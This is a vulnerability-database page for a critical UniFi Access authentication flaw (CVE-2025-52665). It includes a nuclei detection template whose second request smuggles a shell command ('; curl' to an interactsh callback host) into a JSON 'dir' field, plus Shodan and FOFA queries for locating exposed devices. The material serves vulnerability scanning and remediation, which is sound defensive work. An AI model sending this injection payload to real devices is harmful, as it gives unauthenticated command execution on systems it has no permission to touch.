Lucene search
K

UniFi Access - Broken Access Control

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 21 Views

UniFi Access versions 3.3.22–3.4.31 expose management APIs without authentication; upgrade to 4.0.21 or later.

Related
Refs
Code
ReporterTitlePublishedViews
Family
BDU FSTEC
The vulnerability of the UniFi Access access control system, related to deficiencies in authentication procedures, allows a perpetrator to gain full control over the system.
9 Jan 202600:00
bdu_fstec
Circl
CVE-2025-52665
31 Oct 202503:46
circl
CNNVD
Ubiquiti UniFi Access Application 安全漏洞
31 Oct 202500:00
cnnvd
CVE
CVE-2025-52665
30 Oct 202523:30
cve
Cvelist
CVE-2025-52665
30 Oct 202523:30
cvelist
EUVD
EUVD-2025-37233
31 Oct 202500:30
euvd
NVD
CVE-2025-52665
31 Oct 202500:15
nvd
OSV
CVE-2025-52665
31 Oct 202500:15
osv
Positive Technologies
PT-2025-43553
23 Oct 202500:00
ptsecurity
RedhatCVE
CVE-2025-52665
1 Nov 202500:25
redhatcve
Rows per page
id: CVE-2025-52665

info:
  name: UniFi Access - Broken Access Control
  author: theamanrawat,DhiyaneshDK
  severity: critical
  description: |
    UniFi Access Application 3.3.22 through 3.4.31 contains a broken authentication caused by misconfiguration exposing management API without proper authentication, letting attackers on management network access management functions, exploit requires network access.
  impact: |
    Attackers on the management network can access management APIs without authentication, potentially leading to unauthorized control of the system.
  remediation: |
    Update to version 4.0.21 or later.
  reference:
    - https://community.ui.com/releases/Security-Advisory-Bulletin-056-056/ce97352d-91cd-40a7-a2f4-2c73b3b30191
    - https://www.catchify.sa/post/cve-2025-52665-rce-in-unifi-os-25-000
    - https://nvd.nist.gov/vuln/detail/CVE-2025-52665
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-52665
    epss-score: 0.40972
    epss-percentile: 0.98487
    cwe-id: CWE-306
  metadata:
    max-request: 2
    verified: false
    shodan-query: http.html:"UniFi OS"
    fofa-query: body="UniFi OS"
  tags: cve,cve2025,unifi,rce,vuln,vkev

flow: http(1) && http(2)

variables:
  rand_string: '{{to_lower(rand_text_alpha(6))}}'

http:
  - raw:
      - |
        GET /login HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_any(body, "UniFi OS","UniFi Dream Machine SE")'
        condition: and
        internal: true

  - raw:
      - |
        @Host: {{Host}}:9780
        POST /api/ucore/backup/export HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
        "dir":"/tmp/{{rand_string}}-; curl http://{{interactsh-url}}/; #"
        }

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4a0a00473045022027191a770f9d97f88d237ed98691ead7cf45051c17f5fddcdc8a204f87af9058022100af3c17fc6a744885733da40e7820bdf6c90db1960121c617f4830c21108158ac:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.110
EPSS0.40972
SSVC
21